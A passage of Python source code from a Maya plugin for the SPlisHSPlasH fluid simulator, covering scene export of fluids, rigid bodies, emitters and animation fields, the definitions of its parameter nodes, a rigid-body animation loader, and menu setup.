scene['Configuration'] = OrderedDict()
sphConfigList = cmds.ls( type='SPHConfigurationNode', long=True )
sphConfig = ""
if len(sphConfigList) == 0:
cmds.warning("Not saved since no SPH configuration node was found.")
return None
elif len(sphConfigList) > 1:
sphConfig = sphConfigList[0]
res = cmds.layoutDialog(ui=self.openFluidIdDialog)
if res == "Cancel":
return None
else:
sphConfig = res[3:]
else:
sphConfig = sphConfigList[0]
#cmds.warning("More than one SPH configuration node was found using " + sphConfigList[0] + ".")
attributes = cmds.listAttr(sphConfig, string="SPH_*", sn=False)
for attr in attributes:
if cmds.getAttr(sphConfig + "." + attr, type=True) == "float3":
value = cmds.getAttr(sphConfig + "." + attr)[0]
elif cmds.getAttr(sphConfig + "." + attr, type=True) == "long3":
value = cmds.getAttr(sphConfig + "." + attr)[0]
else:
value = cmds.getAttr(sphConfig + "." + attr)
# avoid to write child attributes
parent = cmds.attributeQuery( attr, node=sphConfig, listParent=True )
if parent == None:
scene["Configuration"][attr[4:]] = value
fluidConfigList = cmds.ls( type='SPHFluidConfigurationNode', long=False )
if len(fluidConfigList) == 0:
cmds.warning("Not saved since no fluid material node was found.")
return
for fluid in fluidConfigList:
attributes = cmds.listAttr(fluid, string="SPH_*", sn=False)
mat = OrderedDict()
mat['id'] = fluid
for attr in attributes:
if cmds.getAttr(fluid + "." + attr, type=True) == "float3":
value = cmds.getAttr(fluid + "." + attr)[0]
elif cmds.getAttr(fluid + "." + attr, type=True) == "long3":
value = cmds.getAttr(fluid + "." + attr)[0]
else:
value = cmds.getAttr(fluid + "." + attr)
mat[attr[4:]] = value
scene["Materials"].append(mat)
rigidBodyList = cmds.ls( type='SPHRigidBodyNode', long=False )
for rb in rigidBodyList:
self.addRigidBody(scene, rb, scenePath)
fluidList = cmds.ls( type='SPHFluidNode', long=False )
for fluid in fluidList:
self.addFluid(scene, fluid, scenePath)
emitters = PluginFunctions.getAllNodesOfType("RectangularEmitter")
for emitter in emitters:
self.addRectangularEmitter(sphConfig, scene, emitter, scenePath)
emitters = PluginFunctions.getAllNodesOfType("CircularEmitter")
for emitter in emitters:
self.addCircularEmitter(sphConfig, scene, emitter, scenePath)
animFields = PluginFunctions.getAllNodesOfType("AnimationField")
for animField in animFields:
self.addAnimationField(sphConfig, scene, animField, scenePath)
return scene
######################################################
# getCurrentParticleRadius
######################################################
def getCurrentParticleRadius(self, sphConfig):
return cmds.getAttr(sphConfig + ".particleRadius")
######################################################
# add rigid bodies
######################################################
def addRigidBody(self, scene, rbNode, scenePath):
# export geometry
tr = cmds.listRelatives( rbNode, allParents=True )
cmds.select(tr, replace=True)
# export geometry
polyTri = cmds.polyTriangulate()
name = cmds.ls( selection=True, type='transform', long=False )[0]
fileName = os.path.join(scenePath, "rb_" + name + ".obj")
cmds.file(fileName, force=True, options="groups=0;ptgroups=0;materials=0;smoothing=0;normals=0", pr=True, exportSelected=True, type="OBJexport")
cmds.delete(polyTri)
attributes = cmds.listAttr(rbNode, string="SPH_*", sn=False)
rb = OrderedDict()
for attr in attributes:
if cmds.getAttr(rbNode + "." + attr, type=True) == "float3":
value = cmds.getAttr(rbNode + "." + attr)[0]
elif cmds.getAttr(rbNode + "." + attr, type=True) == "long3":
value = cmds.getAttr(rbNode + "." + attr)[0]
else:
value = cmds.getAttr(rbNode + "." + attr)
# avoid to write child attributes
parent = cmds.attributeQuery( attr, node=rbNode, listParent=True )
if parent == None:
rb[attr[4:]] = value
rb['translation'] = [0,0,0]
rb['rotationaxis'] = [1,0,0]
rb['rotationangle'] = 0.0
rb['scale'] = [1,1,1]
rb['geometryFile'] = "rb_" + name + ".obj"
scene['RigidBodies'].append(rb)
#color = cmds.getAttr(rbNode + ".SPH_color")[0]
#color = color + (1.0,)
######################################################
# add fluid
######################################################
def addFluid(self, scene, fluidNode, scenePath):
# export geometry
tr = cmds.listRelatives( fluidNode, allParents=True )
cmds.select(tr, replace=True)
particleFile = cmds.getAttr(fluidNode + ".particleFile")
name = ""
if (particleFile == ""):
polyTri = cmds.polyTriangulate()
name = cmds.ls( selection=True, type='transform', long=False )[0]
fileName = os.path.join(scenePath, "fluid_" + name + ".obj")
cmds.file(fileName, force=True, options="groups=0;ptgroups=0;materials=0;smoothing=0;normals=0", pr=True, exportSelected=True, type="OBJexport")
cmds.delete(polyTri)
attributes = cmds.listAttr(fluidNode, string="SPH_*", sn=False)
fluid = OrderedDict()
for attr in attributes:
if cmds.getAttr(fluidNode + "." + attr, type=True) == "float3":
value = cmds.getAttr(fluidNode + "." + attr)[0]
elif cmds.getAttr(fluidNode + "." + attr, type=True) == "long3":
value = cmds.getAttr(fluidNode + "." + attr)[0]
else:
value = cmds.getAttr(fluidNode + "." + attr)
# avoid to write child attributes
parent = cmds.attributeQuery( attr, node=fluidNode, listParent=True )
if parent == None:
fluid[attr[4:]] = value
if (particleFile == ""):
fluid['particleFile'] = "fluid_" + name + ".obj"
fluid['translation'] = [0,0,0]
fluid['rotationaxis'] = [1,0,0]
fluid['rotationangle'] = 0.0
fluid['scale'] = [1,1,1]
scene['FluidModels'].append(fluid)
######################################################
# add rectangular emitter
######################################################
def addRectangularEmitter(self, sphConfig, scene, node, scenePath):
t = cmds.xform(node, query=True, t=True, ws=True)
s = cmds.xform(node, query=True, s=True, ws=True)
# get particleRadius
radius = self.getCurrentParticleRadius(sphConfig)
diam = 2.0 * radius
s[1] -= 2.0*diam
s[2] -= 2.0*diam
axisAngle = PluginFunctions.getAxisAngle(node)
startTime = cmds.getAttr(node + ".SPH_startTime")
endTime = cmds.getAttr(node + ".SPH_endTime")
velocity = cmds.getAttr(node + ".SPH_velocity")
id = cmds.getAttr(node + ".SPH_fluidId")
emitter = {
'id': id,
'width': int(s[2]/diam),
'height': int(s[1]/diam),
'translation': t,
'rotationAxis': axisAngle[0],
'rotationAngle': axisAngle[1],
'emitStartTime': startTime,
'emitEndTime': endTime,
'velocity' : velocity,
'type' : 0
}
scene['Emitters'].append(emitter)
######################################################
# add circular emitter
######################################################
def addCircularEmitter(self, sphConfig, scene, node, scenePath):
t = cmds.xform(node, query=True, t=True, ws=True)
s = cmds.xform(node, query=True, s=True, ws=True)
# get particleRadius
radius = self.getCurrentParticleRadius(sphConfig)
s[1] -= 2.0*radius
axisAngle = PluginFunctions.getAxisAngle(node)
startTime = cmds.getAttr(node + ".SPH_startTime")
endTime = cmds.getAttr(node + ".SPH_endTime")
velocity = cmds.getAttr(node + ".SPH_velocity")
id = cmds.getAttr(node + ".SPH_fluidId")
emitter = {
'id': id,
'width': int(s[1]/radius),
'translation': t,
'rotationAxis': axisAngle[0],
'rotationAngle': axisAngle[1],
'emitStartTime': startTime,
'emitEndTime': endTime,
'velocity' : velocity,
'type' : 1
}
scene['Emitters'].append(emitter)
######################################################
# add animation field
######################################################
def addAnimationField(self, sphConfig, scene, node, scenePath):
t = cmds.xform(node, query=True, t=True, ws=True)
s = cmds.xform(node, query=True, s=True, ws=True)
axisAngle = PluginFunctions.getAxisAngle(node)
particleField = cmds.getAttr(node + ".SPH_particleField")
shapeType = cmds.getAttr(node + ".SPH_shapeType")
expression_x = cmds.getAttr(node + ".SPH_expressionX")
expression_y = cmds.getAttr(node + ".SPH_expressionY")
expression_z = cmds.getAttr(node + ".SPH_expressionZ")
animField = {
'particleField': particleField,
'translation': t,
'rotationAxis': axisAngle[0],
'rotationAngle': axisAngle[1],
'scale': s,
'shapeType': shapeType,
'expression_x' : expression_x,
'expression_y' : expression_y,
'expression_z' : expression_z
}
scene['AnimationFields'].append(animField)
def addAttributesToSPHNode(node):
# add attributes
for key in node.sphParameters:
params = node.sphParameters[key]
for param in params:
paramType = param["type"]
paramName = param["name"]
paramLabel = param["label"]
if paramType == "bool":
attr = PluginFunctions.createBoolAttr("SPH_" + paramName, paramName, param["value"])
node.addAttribute( attr )
elif paramType == "float":
attr = PluginFunctions.createFloatAttr("SPH_" + paramName, paramName, param["value"], param["min"], param["max"], param["fieldMin"], param["fieldMax"])
node.addAttribute( attr )
elif paramType == "int":
attr = PluginFunctions.createIntAttr("SPH_" + paramName, paramName, param["value"], param["min"], param["max"], param["fieldMin"], param["fieldMax"])
node.addAttribute( attr )
elif paramType == "vec3":
attr = PluginFunctions.createVec3Attr("SPH_" + paramName, paramName, param["value"])
node.addAttribute( attr )
elif paramType == "color":
attr = PluginFunctions.createColorAttr("SPH_" + paramName, paramName, param["value"])
node.addAttribute( attr )
elif paramType == "vec3i":
attr = PluginFunctions.createVec3iAttr("SPH_" + paramName, paramName, param["value"])
node.addAttribute( attr )
elif paramType == "enum":
attr = PluginFunctions.createEnumAttr("SPH_" + paramName, paramName, param["value"], param["enumList"])
node.addAttribute( attr )
elif paramType == "string":
attr = PluginFunctions.createStringAttr("SPH_" + paramName, paramName, param["value"])
node.addAttribute( attr )
# Node definition
class SPHConfigurationNode(OpenMayaMPx.MPxLocatorNode):
kPluginNodeId = OpenMaya.MTypeId(0x90000)
kPluginNodeTypeName = "SPHConfigurationNode"
# class variables
input = OpenMaya.MObject()
dataAttr = OpenMaya.MObject()
sphParameters = OrderedDict()
def __init__(self):
OpenMayaMPx.MPxLocatorNode.__init__(self)
def postConstructor(self):
OpenMayaMPx.MPxLocatorNode.postConstructor(self)
# initializer
@staticmethod
def initialize():
SPHConfigurationNode.initParameters()
addAttributesToSPHNode(SPHConfigurationNode)
# creator
@staticmethod
def creator():
return OpenMayaMPx.asMPxPtr( SPHConfigurationNode() )
def compute(self,plug,dataBlock):
# if ( plug == SPHConfigurationNode.output ):
# dataHandle = dataBlock.inputValue( SPHConfigurationNode.input )
# inputFloat = dataHandle.asFloat()
# result = math.sin( inputFloat ) * 10.0
# outputHandle = dataBlock.outputValue( SPHConfigurationNode.output )
# outputHandle.setFloat( result )
# dataBlock.setClean( plug )
return OpenMaya.kUnknownParameter
######################################################
# initParameters
######################################################
@staticmethod
def initParameters():
SPHConfigurationNode.sphParameters["General"] = [
PluginFunctions.createBoolParam("pause", "Pause", "Pause simulation after loading.", True),
PluginFunctions.createFloatParam("timeStepSize", "Time step size", "Time step size", 0.001, 0.00001, 1.0),
PluginFunctions.createFloatParam("pauseAt", "Pause simulation at", "Pause simulation at the given time. When the value is negative, the simulation is not paused.", -1, -1, 100, -1),
PluginFunctions.createFloatParam("stopAt", "Stop simulation at", "Stop simulation at the given time. When the value is negative, the simulation is not stopped.", -1, -1, 100, -1)
]
SPHConfigurationNode.sphParameters["Visualization"] = [
PluginFunctions.createVec3Param("cameraPosition", "Camera position", "Initial position of the camera.", [0.0,3.0,8.0]),
PluginFunctions.createVec3Param("cameraLookat", "Camera lookat", "Lookat point of the camera.", [0.0,0.0,0.0]),
PluginFunctions.createIntParam("numberOfStepsPerRenderUpdate", "# time steps / update", "Number of simulation steps per rendered frame.", 4, 1, 100),
PluginFunctions.createEnumParam("renderWalls", "Render walls", "Make walls visible/invisible.", 4, ["None", "Particles (all)", "Particles (no walls)", "Geometry (all)", "Geometry (no walls)"]),
]
SPHConfigurationNode.sphParameters["Export"] = [
PluginFunctions.createBoolParam("enablePartioExport", "Partio export", "Enable/disable partio export.", False),
PluginFunctions.createBoolParam("enableRigidBodyExport", "Rigid body export", "Enable/disable rigid body export.", False),
PluginFunctions.createBoolParam("enableVTKExport", "VTK export", "Enable/disable VTK export.", False),
PluginFunctions.createBoolParam("enableRigidBodyVTKExport", "Rigid body VTK export", "Enable/disable rigid body VTK export.", False),
PluginFunctions.createFloatParam("dataExportFPS", "Export FPS", "Frame rate of particle export.", 25, 0.1, 1000),
PluginFunctions.createStringParam("particleAttributes", "Export attributes", "Attributes that are exported in the particle files (except id and position).", "velocity"),
PluginFunctions.createBoolParam("enableStateExport", "State export", "Enable/disable simulation state export.", False),
PluginFunctions.createFloatParam("stateExportFPS", "State export FPS", "Frame rate of state export.", 1, 0.1, 1000)
]
SPHConfigurationNode.sphParameters["Simulation"] = [
PluginFunctions.createBoolParam("sim2D", "2D simulation", "2D/3D simulation.", False),
PluginFunctions.createBoolParam("enableZSort", "Enable z-sort", "Enable z-sort to improve cache hits.", True),
PluginFunctions.createFloatParam("particleRadius", "Particle radius", "Radius of the fluid particles.", 0.025, 0.0001, 1000.0, 0),
PluginFunctions.createVec3Param("gravitation", "Gravitation", "Vector to define the gravitational acceleration.", [0,-9.81,0]),
PluginFunctions.createEnumParam("simulationMethod", "Simulation method", "Simulation method.", 4, ["WCSPH", "PCISPH", "PBF", "IISPH", "DFSPH", "Projective Fluids"]),
PluginFunctions.createIntParam("maxIterations", "Max. iterations", "Maximal number of iterations of the pressure solver.", 100, 1, 1000, 1),
PluginFunctions.createFloatParam("maxError", "Max. density error(%)", "Maximal density error (%).", 0.01, 1.0e-6, 1.0, 0),
PluginFunctions.createEnumParam("boundaryHandlingMethod", "Boundary handling method", "Boundary handling method.", 2, ["Akinci et al. 2012", "Koschier and Bender 2017", "Bender et al. 2019"])
]
SPHConfigurationNode.sphParameters["CFL"] = [
PluginFunctions.createEnumParam("cflMethod", "CFL - method", "CFL method used for adaptive time stepping.", 1, ["None", "CFL", "CFL - iterations"]),
PluginFunctions.createFloatParam("cflFactor", "CFL - factor", "Factor to scale the CFL time step size.", 0.5, 1e-6, 10.0, 0),
PluginFunctions.createFloatParam("cflMinTimeStepSize", "CFL - min. time step size", "Min. time step size.", 0.0001, 1e-7, 1.0, 0),
PluginFunctions.createFloatParam("cflMaxTimeStepSize", "CFL - max. time step size", "Max. time step size.", 0.005, 1e-6, 1.0, 0)
]
SPHConfigurationNode.sphParameters["Kernel"] = [
PluginFunctions.createEnumParam("kernel", "Kernel", "Kernel function used in the SPH model (in 2D use only cubic or Wendland).", 4, ["Cubic spline", "Wendland quintic C2", "Poly6", "Spiky", "Precomputed cubic spline"]),
PluginFunctions.createEnumParam("gradKernel", "Gradient of kernel", "Gradient of the kernel function used in the SPH model (in 2D use only cubic or Wendland).", 4, ["Cubic spline", "Wendland quintic C2", "Poly6", "Spiky", "Precomputed cubic spline"])
]
SPHConfigurationNode.sphParameters["WCSPH"] = [
PluginFunctions.createFloatParam("stiffness", "Stiffness", "Stiffness coefficient of EOS.", 10000, 0, 500000),
PluginFunctions.createFloatParam("exponent", "Exponent (gamma)", "Exponent of EOS.", 7.0, 1.0e-6, 10.0, 0)
]
SPHConfigurationNode.sphParameters["PBF"] = [
PluginFunctions.createEnumParam("velocityUpdateMethod", "Velocity update method", "Method for the velocity integration.", 0, ["First Order Update", "Second Order Update"])
]
SPHConfigurationNode.sphParameters["DFSPH"] = [
PluginFunctions.createIntParam("maxIterationsV", "Max. iterations (divergence)", "Maximal number of iterations of the divergence solver.", 100, 1, 1000, 1),
PluginFunctions.createFloatParam("maxErrorV", "Max. divergence error(%)", "Maximal divergence error (%).", 0.01, 1.0e-6, 1.0, 0),
PluginFunctions.createBoolParam("enableDivergenceSolver", "Enable divergence solver", "Turn divergence solver on/off.", True)
]
SPHConfigurationNode.sphParameters["Projective Fluids"] = [
PluginFunctions.createFloatParam("stiffnessPF", "Stiffness", "Stiffness coefficient.", 50000, 0, 500000)
]
# Node definition
class SPHFluidConfigurationNode(OpenMayaMPx.MPxLocatorNode):
kPluginNodeId = OpenMaya.MTypeId(0x90001)
kPluginNodeTypeName = "SPHFluidConfigurationNode"
# class variables
input = OpenMaya.MObject()
dataAttr = OpenMaya.MObject()
sphParameters = OrderedDict()
def __init__(self):
OpenMayaMPx.MPxLocatorNode.__init__(self)
# initializer
@staticmethod
def initialize():
SPHFluidConfigurationNode.initParameters()
addAttributesToSPHNode(SPHFluidConfigurationNode)
# creator
@staticmethod
def creator():
return OpenMayaMPx.asMPxPtr( SPHFluidConfigurationNode() )
######################################################
# initParameters
######################################################
@staticmethod
def initParameters():
SPHFluidConfigurationNode.sphParameters["Simulation"] = [
PluginFunctions.createFloatParam("density0", "Rest density", "Rest density of the fluid.", 1000.0, 0.1, 10000.0)
]
SPHFluidConfigurationNode.sphParameters["Visualization"] = [
PluginFunctions.createStringParam("colorField", "Color field", "Choose vector or scalar field for particle coloring.", "velocity"),
PluginFunctions.createEnumParam("colorMapType", "Color map type", "Selection of a color map for coloring the scalar/vector field.", 1, ["None", "Jet", "Plasma"]),
PluginFunctions.createFloatParam("renderMinValue", "Min. value", "Minimal value used for color-coding the color field in the rendering process.", 0, -1000, 1000, -1000000),
PluginFunctions.createFloatParam("renderMaxValue", "Max. value", "Maximal value used for color-coding the color field in the rendering process.", 5, -1000, 1000, -1000000)
]
SPHFluidConfigurationNode.sphParameters["Emitters"] = [
PluginFunctions.createIntParam("maxEmitterParticles", "Max. number of emitted particles", "Maximum number of emitted particles", 10000, 1, 10000000, 0, 100000000),
PluginFunctions.createBoolParam("emitterReuseParticles", "Reuse particles", "Reuse particles if they are outside of the bounding box defined by emitterBoxMin, emitterBoxMaRex.", False),
PluginFunctions.createVec3Param("emitterBoxMin", "Emitter box min.", "Minimum coordinates of an axis-aligned box (used in combination with emitterReuseParticles).", [0.0,0.0,0.0]),
PluginFunctions.createVec3Param("emitterBoxMax", "Emitter box max.", "Maximum coordinates of an axis-aligned box (used in combination with emitterReuseParticles).", [1.0,1.0,1.0])
]
SPHFluidConfigurationNode.sphParameters["Viscosity"] = [
PluginFunctions.createEnumParam("viscosityMethod", "Viscosity", "Method to compute viscosity forces.", 1, ["None", "Standard", "XSPH", "Bender and Koschier 2017", "Peer et al. 2015", "Peer et al. 2016", "Takahashi et al. 2015 (improved)", "Weiler et al. 2018"]),
PluginFunctions.createFloatParam("viscosity", "Viscosity coefficient", "Coefficient for the viscosity force computation.", 0.01, 0, 1000, 0),
PluginFunctions.createIntParam("viscoMaxIter", "Max. iterations (visco)", "(Implicit solvers) Max. iterations of the viscosity solver.", 100, 1, 1000),
PluginFunctions.createFloatParam("viscoMaxError", "Max. visco error", "(Implicit solvers) Max. error of the viscosity solver.", 0.01, 1e-6, 1, 0),
PluginFunctions.createIntParam("viscoMaxIterOmega", "Max. iterations (vorticity diffusion)", "(Peer et al. 2016) Max. iterations of the vorticity diffusion solver.", 100, 1, 1000),
PluginFunctions.createFloatParam("viscoMaxErrorOmega", "Max. vorticity diffusion error", "(Peer et al. 2016) Max. error of the vorticity diffusion solver.", 0.01, 1e-6, 1, 0),
PluginFunctions.createFloatParam("viscosityBoundary", "Viscosity coefficient (Boundary)", "Coefficient for the viscosity force computation at the boundary.", 0.0, 0, 1000, 0)
]
SPHFluidConfigurationNode.sphParameters["Vorticity"] = [
PluginFunctions.createEnumParam("vorticityMethod", "Vorticity method", "Method to compute vorticity forces.", 0, ["None", "Micropolar model", "Vorticity confinement"]),
PluginFunctions.createFloatParam("vorticity", "Vorticity coefficient", "Coefficient for the vorticity force computation.", 0.01, 0, 10.0, 0),
PluginFunctions.createFloatParam("viscosityOmega", "Angular viscosity coefficient", "Viscosity coefficient for the angular velocity field.", 0.1, 0, 10.0, 0),
PluginFunctions.createFloatParam("inertiaInverse", "Inertia inverse", "Inverse microinertia used in the micropolar model.", 0.5, 0, 10.0, 0)
]
SPHFluidConfigurationNode.sphParameters["Drag force"] = [
PluginFunctions.createEnumParam("dragMethod", "Drag method", "Method to compute drag forces.", 0, ["None", "Macklin et al. 2014", "Gissler et al. 2017"]),
PluginFunctions.createFloatParam("drag", "Drag coefficient", "Coefficient for the drag force computation.", 0.01, 0, 100.0, 0)
]
SPHFluidConfigurationNode.sphParameters["Surface tension"] = [
PluginFunctions.createEnumParam("surfaceTensionMethod", "Surface tension method", "Method to compute surface tension forces.", 0, ["None", "Becker & Teschner 2007", "Akinci et al. 2013", "He et al. 2014"]),
PluginFunctions.createFloatParam("surfaceTension", "Surface tension coefficient", "Coefficient for the surface tension computation.", 0.05, 0, 100.0, 0)
]
SPHFluidConfigurationNode.sphParameters["Elasticity"] = [
PluginFunctions.createEnumParam("elasticityMethod", "Elasticity method", "Method to compute elastic forces.", 0, ["None", "Becker et al. 2009", "Peer et al. 2018"]),
PluginFunctions.createFloatParam("youngsModulus", "Young's modulus", "Stiffness of the elastic material.", 100000.0, 0, 1000.0, 0),
PluginFunctions.createFloatParam("poissonsRatio", "Poisson's ratio", "Ratio of transversal expansion and axial compression.", 0.3, -0.9999, 0.4999, -0.9999),
PluginFunctions.createIntParam("elasticityMaxIter", "Max. iterations (elasticity)", "(Implicit solvers) Max. iterations of the elasticity solver.", 100, 1, 1000),
PluginFunctions.createFloatParam("elasticityMaxError", "Max. elasticity error", "(Implicit solvers) Max. error of the elasticity solver.", 0.0001, 1e-6, 1, 0),
PluginFunctions.createFloatParam("alpha", "Zero-energy modes suppression", "Coefficent for zero-energy modes suppression method.", 0.0, 0, 10000.0, 0)
]
class SPHFluidNode(OpenMayaMPx.MPxLocatorNode):
kPluginNodeId = OpenMaya.MTypeId(0x90002)
kPluginNodeTypeName = "SPHFluidNode"
# class variables
input = OpenMaya.MObject()
dataAttr = OpenMaya.MObject()
sphParameters = OrderedDict()
def __init__(self):
OpenMayaMPx.MPxLocatorNode.__init__(self)
def postConstructor(self):
OpenMayaMPx.MPxLocatorNode.postConstructor(self)
# initializer
@staticmethod
def initialize():
SPHFluidNode.initParameters()
addAttributesToSPHNode(SPHFluidNode)
# creator
@staticmethod
def creator():
return OpenMayaMPx.asMPxPtr( SPHFluidNode() )
def compute(self,plug,dataBlock):
# if ( plug == SPHFluidNode.output ):
# dataHandle = dataBlock.inputValue( SPHFluidNode.input )
# inputFloat = dataHandle.asFloat()
# result = math.sin( inputFloat ) * 10.0
# outputHandle = dataBlock.outputValue( SPHFluidNode.output )
# outputHandle.setFloat( result )
# dataBlock.setClean( plug )
return OpenMaya.kUnknownParameter
######################################################
# initParameters
######################################################
@staticmethod
def initParameters():
SPHFluidNode.sphParameters["General"] = [
PluginFunctions.createStringParam("id", "Fluid id", "Id of the fluid material.", "Fluid"),
PluginFunctions.createVec3Param("initialVelocity", "Initial velocity", "Initial velocity of the fluid.", [0.0,0.0,0.0]),
PluginFunctions.createVec3Param("initialAngularVelocity", "Initial angular velocity", "Initial angular velocity of the fluid.", [0.0,0.0,0.0]),
PluginFunctions.createVec3iParam("resolutionSDF", "SDF resolution", "Resolution of the SDF.", [20,20,20]),
PluginFunctions.createBoolParam("invert", "Invert SDF", "Invert the SDF, flips inside/outside.", False),
PluginFunctions.createEnumParam("denseMode", "Dense mode", "Sampling mode.", 0, ["Regular", "Almost dense", "Dense"]),
PluginFunctions.createStringParam("particleFile", "Particle sampling file", "Particle sampling file.", ""),
]
class SPHRigidBodyNode(OpenMayaMPx.MPxLocatorNode):
kPluginNodeId = OpenMaya.MTypeId(0x90003)
kPluginNodeTypeName = "SPHRigidBodyNode"
# class variables
input = OpenMaya.MObject()
dataAttr = OpenMaya.MObject()
sphParameters = OrderedDict()
def __init__(self):
OpenMayaMPx.MPxLocatorNode.__init__(self)
def postConstructor(self):
OpenMayaMPx.MPxLocatorNode.postConstructor(self)
# initializer
@staticmethod
def initialize():
SPHRigidBodyNode.initParameters()
addAttributesToSPHNode(SPHRigidBodyNode)
# creator
@staticmethod
def creator():
return OpenMayaMPx.asMPxPtr( SPHRigidBodyNode() )
def compute(self,plug,dataBlock):
# if ( plug == SPHRigidBodyNode.output ):
# dataHandle = dataBlock.inputValue( SPHRigidBodyNode.input )
# inputFloat = dataHandle.asFloat()
# result = math.sin( inputFloat ) * 10.0
# outputHandle = dataBlock.outputValue( SPHRigidBodyNode.output )
# outputHandle.setFloat( result )
# dataBlock.setClean( plug )
return OpenMaya.kUnknownParameter
######################################################
# initParameters
######################################################
@staticmethod
def initParameters():
SPHRigidBodyNode.sphParameters["General"] = [
PluginFunctions.createBoolParam("isDynamic", "Dynamic", "Defines if the body is static or dynamic.", False),
PluginFunctions.createBoolParam("isWall", "Wall", "Defines if this is a wall. Walls are typically not rendered. This is the only difference.", False),
PluginFunctions.createColorParam("color", "Color", "Color of the body", [0.2, 0.2, 0.2]),
PluginFunctions.createFloatParam("density", "Density", "Rest density of the body.", 1000.0, 0, 100000.0, 0),
PluginFunctions.createVec3iParam("mapResolution", "Map resolution", "Resolution of the volume/density map.", [20,20,20]),
PluginFunctions.createBoolParam("mapInvert", "Invert map", "Invert the volume/density map, flips inside/outside.", False),
PluginFunctions.createFloatParam("mapThickness", "Map thickness", "Thickness of the map.", 0.0, 0, 100.0, 0),
PluginFunctions.createVec3iParam("resolutionSDF", "SDF resolution", "Resolution of the SDF.", [20,20,20]),
PluginFunctions.createBoolParam("invert", "Invert SDF", "Invert the SDF, flips inside/outside.", False),
PluginFunctions.createEnumParam("samplingMode", "Sampling mode", "Sampling mode.", 0, ["Poisson disk sanmpling", "Regular triangle sampling"]),
]
######################################################
# loadRigidBodies
#
# load rigid body data that was exported by
# a SPH simulation
######################################################
class loadRigidBodiesCmd(OpenMayaMPx.MPxCommand):
s_name = "loadRigidBodies"
def __init__(self):
OpenMayaMPx.MPxCommand.__init__(self)
@staticmethod
def creator():
return loadRigidBodiesCmd()
def doIt(self, args):
self.addedNodes = []
self.firstFileName = cmds.fileDialog2(ff="*.bin", fm=1, dir="")[0]
indexlist = re.findall(r'\d+', self.firstFileName)
if len(indexlist) == 0:
cmds.warning("No frame index found in file name.")
return
self.firstFrame = int(indexlist[-1])
self.redoIt()
def redoIt(self):
self.loadRigidBodies()
def loadRigidBodies(self):
folderName = os.path.dirname(self.firstFileName)
frameNumber = self.firstFrame
firstFile = open(self.firstFileName, 'rb')
# read number of bodies
bytes = firstFile.read()
firstFile.close()
(numBodies,), bytes = struct.unpack('i', bytes[:4]), bytes[4:]
objFiles = []
transformNodes = []
for i in range(0, numBodies):
# determine length of file name string
(strLength,), bytes = struct.unpack('i', bytes[:4]), bytes[4:]
# read file name
objFile, bytes = bytes[:strLength], bytes[strLength:]
# Check for duplicates and create instances
if objFile in objFiles:
idx = objFiles.index(objFile)
newNodes = cmds.duplicate(transformNodes[idx], instanceLeaf= True)
transformNodes.append(newNodes[0])
self.addedNodes.append(newNodes)
else:
objFileName = os.path.join(folderName, objFile)
newNodes = cmds.file(objFileName, i=True, rnn=True, type="OBJ", options="mo=1")
transformNodes.append(newNodes[0])
objFiles.append(objFile)
self.addedNodes.append(newNodes)
# Read scaling factors in first file
(sx,), bytes = struct.unpack('f', bytes[:4]), bytes[4:]
(sy,), bytes = struct.unpack('f', bytes[:4]), bytes[4:]
(sz,), bytes = struct.unpack('f', bytes[:4]), bytes[4:]
cmds.scale(sx, sy, sz, transformNodes[i])
(isWall,), bytes = struct.unpack('?', bytes[:1]), bytes[1:]
(colr,), bytes = struct.unpack('f', bytes[:4]), bytes[4:]
(colg,), bytes = struct.unpack('f', bytes[:4]), bytes[4:]
(colb,), bytes = struct.unpack('f', bytes[:4]), bytes[4:]
(cola,), bytes = struct.unpack('f', bytes[:4]), bytes[4:]
if isWall:
cmds.setAttr((transformNodes[i] + '.visibility'), 0)
cmds.setKeyframe(transformNodes[i], at="s", t=1)
if frameNumber > 1:
cmds.setKeyframe(transformNodes[i], at="visibility", t=1, value=0)
if not isWall:
cmds.setKeyframe(transformNodes[i], at="visibility", t=frameNumber, value=1)
# load transformations
for i in range(0, numBodies):
# Read translation in first file
(x,), bytes = struct.unpack('f', bytes[:4]), bytes[4:]
(y,), bytes = struct.unpack('f', bytes[:4]), bytes[4:]
(z,), bytes = struct.unpack('f', bytes[:4]), bytes[4:]
# Read rotation in first file
r = []
for j in range(0,9):
(value,), bytes = struct.unpack('f', bytes[:4]), bytes[4:]
r.append(value)
cmds.xform(transformNodes[i], p=True, m=[r[0],r[1],r[2],0,r[3],r[4],r[5],0,r[6],r[7],r[8],0,x,y,z,1])
cmds.setKeyframe(transformNodes[i], at="t", t=frameNumber)
cmds.setKeyframe(transformNodes[i], at="r", t=frameNumber)
# read other files
idx = self.firstFileName.rfind(str(frameNumber))
l = len(str(frameNumber))
chk = True
while chk:
frameNumber += 1
fileName = str(self.firstFileName[0:idx]) + str(frameNumber) + str(self.firstFileName[idx+l:])
chk = os.path.exists(fileName)
if chk:
f = open(fileName, 'rb')
bytes = f.read()
f.close()
# load transformations
for i in range(0, numBodies):
# Read translation in file
(x,), bytes = struct.unpack('f', bytes[:4]), bytes[4:]
(y,), bytes = struct.unpack('f', bytes[:4]), bytes[4:]
(z,), bytes = struct.unpack('f', bytes[:4]), bytes[4:]
# Read rotation in file
r = []
for j in range(0,9):
(value,), bytes = struct.unpack('f', bytes[:4]), bytes[4:]
r.append(value)
cmds.xform(transformNodes[i], p=True, m=[r[0],r[1],r[2],0,r[3],r[4],r[5],0,r[6],r[7],r[8],0,x,y,z,1])
cmds.setKeyframe(transformNodes[i], at="t", t=frameNumber)
cmds.setKeyframe(transformNodes[i], at="r", t=frameNumber)
cmds.currentTime(1)
def undoIt(self):
for node in self.addedNodes:
print node
cmds.delete(node)
def isUndoable(self):
return True
######################################################
# createSPHMenu
######################################################
def createSPHMenu():
global menuId
menuId = cmds.menu( label='SPlisHSPlasH', p="MayaWindow" )
cmds.menuItem(divider=True, dividerLabel="Scene generating")
cmds.menuItem( label='Add scene configuration',command=
'if "SPH_Config" not in cmds.ls( type="transform"):\n' +
' cmds.createNode("transform", name="SPH_Config")\n' +
'cmds.createNode("SPHConfigurationNode", name="Configuration", parent="SPH_Config")')
cmds.menuItem( label='Add fluid material',command=
'if "SPH_Fluid_Material" not in cmds.ls( type="transform"):\n' +
' cmds.createNode("transform", name="SPH_Fluid_Material")\n' +
'cmds.createNode("SPHFluidConfigurationNode", name="Fluid", parent="SPH_Fluid_Material")')
cmds.menuItem(divider=True)
cmds.menuItem( label='Convert selection to fluid',command='cmds.convertToFluid()' )
cmds.menuItem( label='Convert selection to rigid bodies',command='cmds.convertToRigidBodies()' )
cmds.menuItem(divider=True)
cmds.menuItem( label='Create rectangular emitter',command='cmds.createRectangularEmitter()' )
